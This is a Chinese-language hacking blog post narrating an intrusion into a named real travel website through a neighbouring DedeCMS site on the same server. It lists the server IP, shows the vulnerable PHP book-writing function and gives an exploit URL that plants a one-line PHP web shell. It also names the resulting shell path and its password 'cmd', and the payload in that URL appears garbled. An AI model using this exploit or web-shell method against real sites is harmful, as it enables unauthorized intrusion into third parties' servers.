大家好，有好長(zhǎng)時(shí)間沒(méi)有寫(xiě)檢測(cè)方面的文章了。今天，受朋友之托檢測(cè)一個(gè)網(wǎng)站，下面和大家一起分享其中的檢測(cè)過(guò)程，希望大家能在文章中學(xué)到一些東西。開(kāi)始我們的檢測(cè)之旅吧！

一、劍行直下

今天要檢測(cè)的網(wǎng)站叫中國(guó)戶(hù)外旅游網(wǎng)，網(wǎng)站網(wǎng)址是http://www.hikers.cn/，網(wǎng)站主要是為全國(guó)各地網(wǎng)友尋找全球最優(yōu)秀生態(tài)旅游景區(qū)，其實(shí)就是為戶(hù)外運(yùn)動(dòng)、旅游提供說(shuō)明指導(dǎo)的網(wǎng)站。我們先來(lái)看看網(wǎng)站結(jié)構(gòu)，網(wǎng)站有論壇、blog、網(wǎng)址大全、機(jī)票、酒店、度假等模塊，其中論壇用的是dz6.0論壇，聽(tīng)說(shuō)dz6.0有0day，可惜我是窮人買(mǎi)不起0day，論壇大致看了下沒(méi)辦法入手。再看看blog程序，暈！blog打不開(kāi)，無(wú)語(yǔ)。再看看網(wǎng)址大全，也沒(méi)發(fā)現(xiàn)什么問(wèn)題。機(jī)票、酒店、度假這三個(gè)模塊全是鏈接的攜程網(wǎng)，再次無(wú)語(yǔ)。剩下只有網(wǎng)站的新聞系統(tǒng)了，看看了新聞系統(tǒng)，全部生成的靜態(tài)頁(yè)面，而且還沒(méi)發(fā)現(xiàn)它新聞系統(tǒng)使用的什么程序，郁悶中。看樣子劍行直上沒(méi)有辦法了，那我們來(lái)看看服務(wù)器上的其它網(wǎng)站，來(lái)一次劍走偏鋒吧！

二、劍走偏鋒

首先，我們來(lái)查查這個(gè)服務(wù)器上放了多少個(gè)網(wǎng)站，服務(wù)器IP地址是222.216.28.235，通過(guò)ip域名查詢(xún)網(wǎng)站http://www.seologs.com/，我們得知服務(wù)器上存放了5個(gè)站點(diǎn)。

圖1

這個(gè)站原來(lái)有一段時(shí)間不能用，是因?yàn)閲?guó)內(nèi)查詢(xún)的人太多了，屏蔽了國(guó)內(nèi)IP，如果以后大家碰到不能查詢(xún)的情況，可以用國(guó)外IP代理查詢(xún)。

根據(jù)我的經(jīng)驗(yàn)，這臺(tái)服務(wù)器上只放了5個(gè)站，應(yīng)該是網(wǎng)站建設(shè)者自己在經(jīng)營(yíng)和維護(hù)，這種服務(wù)器的權(quán)限設(shè)置比那種放了上百個(gè)域名的虛擬主機(jī)權(quán)限差的多，提權(quán)成功率也比虛擬主機(jī)的高，當(dāng)大家碰到一查詢(xún)就是上百個(gè)域名的虛擬主機(jī)時(shí)，能從主站入手就想辦法從主站入手，旁注即使能成功，也很難拿到主站的權(quán)限。旁注是無(wú)奈之舉，能直接拿主站就從主站入手，旁注是最后的辦法，大家一定要記住。

我們來(lái)認(rèn)真看看51maihuo.com和uutxx.com這兩個(gè)站，打開(kāi)一看才發(fā)現(xiàn)這兩個(gè)域名都是同一個(gè)站，這個(gè)網(wǎng)站是個(gè)介紹美食的網(wǎng)站，大致看了下，也沒(méi)發(fā)現(xiàn)什么問(wèn)題，而且還沒(méi)弄明白用的什么程序，此時(shí)非常郁悶。冷靜的想了一會(huì)，這個(gè)服務(wù)器上不應(yīng)該只有兩個(gè)網(wǎng)站啊，換了個(gè)ip域名查詢(xún)網(wǎng)站http://www.114best.com/，查詢(xún)結(jié)果顯示，除了上面兩個(gè)網(wǎng)站外，服務(wù)器上還有一個(gè)網(wǎng)站。

圖2

網(wǎng)址是http://www.travelren.net，網(wǎng)站主要是介紹旅游線(xiàn)路以及旅游景點(diǎn)。網(wǎng)站布局好像有點(diǎn)似曾相識(shí)的感覺(jué)，好像是織夢(mèng)內(nèi)容管理系統(tǒng)，馬上在網(wǎng)址后面加上member，出現(xiàn)了用戶(hù)登錄框。

圖3

果然是織夢(mèng)內(nèi)容系統(tǒng)，這段時(shí)間織夢(mèng)爆出了漏洞，我在本地測(cè)試過(guò)幾次，我說(shuō)布局怎么這么熟呢！最近織夢(mèng)內(nèi)容系統(tǒng)剛爆出過(guò)一個(gè)寫(xiě)入網(wǎng)馬的漏洞，前提是服務(wù)器開(kāi)放會(huì)員系統(tǒng)，而且有圖書(shū)連載里有類(lèi)別。漏洞文件出現(xiàn)在include\inc_bookfunctions.php文件中，代碼如下：

function WriteBookText($cid,$body) 
{ 
global $cfg_cmspath,$cfg_basedir; 
$ipath = $cfg_cmspath."/data/textdata"; 
$tpath = ceil($cid/5000); 
if(!is_dir($cfg_basedir.$ipath)) MkdirAll($cfg_basedir.$ipath,$GLOBALS
['cfg_dir_purview']); 
if(!is_dir($cfg_basedir.$ipath.'/'.$tpath)) MkdirAll($cfg_basedir.$ipath.
'/'.$tpath,$GLOBALS['cfg_dir_purview']); 
$bookfile = $cfg_basedir.$ipath."/{$tpath}/bk{$cid}.php"; 
$body = "<"."?php\r\n".$body."\r\n?".">"; 
@$fp = fopen($bookfile,'w'); 
@flock($fp); 
@fwrite($fp,$body); 
@fclose($fp); 
} 
member\story_add_content_action.php 
WriteBookText($arcID,addslashes($body));

中代碼中我們可以看到，只是用addslashes進(jìn)行了轉(zhuǎn)義。但是$body = "<"."?
php\r\n".$body."\r\n?".">";很明顯可以寫(xiě)入一個(gè)小馬的。

我們先來(lái)訪(fǎng)問(wèn)http://www.travelren.net/member/index_do.php?fmdo=user&dopost=regnew注冊(cè)一個(gè)新用戶(hù)，然后，利用注冊(cè)的新用戶(hù)登錄，會(huì)員系統(tǒng)圖書(shū)連載里有類(lèi)別，馬上提交，

http://www.hikers.cn/member/story_add_content_action.php?chapterid=1&arcID=2&body=?>]);?>

就會(huì)在data\textdata\目錄下生成小馬，默認(rèn)為data\textdata\1\bk1.php，如果有人利用過(guò)這個(gè)漏洞，每提交一次文件名就會(huì)加一，經(jīng)過(guò)我測(cè)試我上傳的小馬地址為http://www.hikers.cn/data/textdata/1/bk9.php，網(wǎng)馬為lanker一句馬，密碼為：cmd，我們來(lái)用lanker客戶(hù)端進(jìn)行連接。

圖4